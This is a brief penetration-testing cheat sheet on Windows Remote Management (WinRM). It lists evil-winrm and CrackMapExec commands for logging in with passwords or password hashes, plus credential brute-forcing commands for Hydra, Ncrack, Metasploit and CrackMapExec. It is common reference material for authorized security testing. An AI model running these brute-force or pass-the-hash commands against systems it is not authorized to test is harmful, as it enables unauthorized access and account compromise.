Introduction¶
WinRM (Windows Remote Management) is a protocol for remote management of Windows machines, It allows for secure communication over HTTP or HTTPS to perform tasks like running scripts and managing data remotely. Integrated into Windows, WinRM is essential for centralized management and automation in multi-server environments.
Connecting to WinRM¶
| Command | Description |
|---|---|
evil-winrm -i [TARGET-IP] -u [USERNAME] -p [PASSWORD] |
Connects to a remote Windows server using evil-winrm,This command requires the IP address of the target machine and valid user credentials. |
crackmapexec winrm [TARGET-IP] -u [USERNAME] -p [PASSWORD] -x "whoami" |
Tests if a specific username and password combination can log in and execute a command to display the current user identity |
crackmapexec winrm [TARGET-IP] -u [USERNAME] -H [HASH] -X '$PSVersionTable' |
Uses a hash for authentication with a PowerShell command to verify access. |
Brute-Forcing WinRM Credentials¶
| TOOL | Command |
|---|---|
| CrackMapExec | crackmapexec winrm [TARGET-IP] -u [USERNAME-LIST] -p [PASSWORD-LIST] --continue-on-success |
| Hydra | hydra -L [USERNAME-LIST] -P [PASSWORD-LIST] [TARGET-IP] winrm -V |
| Metasploit | auxiliary/scanner/winrm/winrm_login |
| Ncrack | ncrack -p 5985 -u [USERNAME-LIST] -P [PASSWORD-LIST] [TARGET-IP] |
Warning
Be cautious with brute-forcing WinRM, As it may lead to user account lockouts.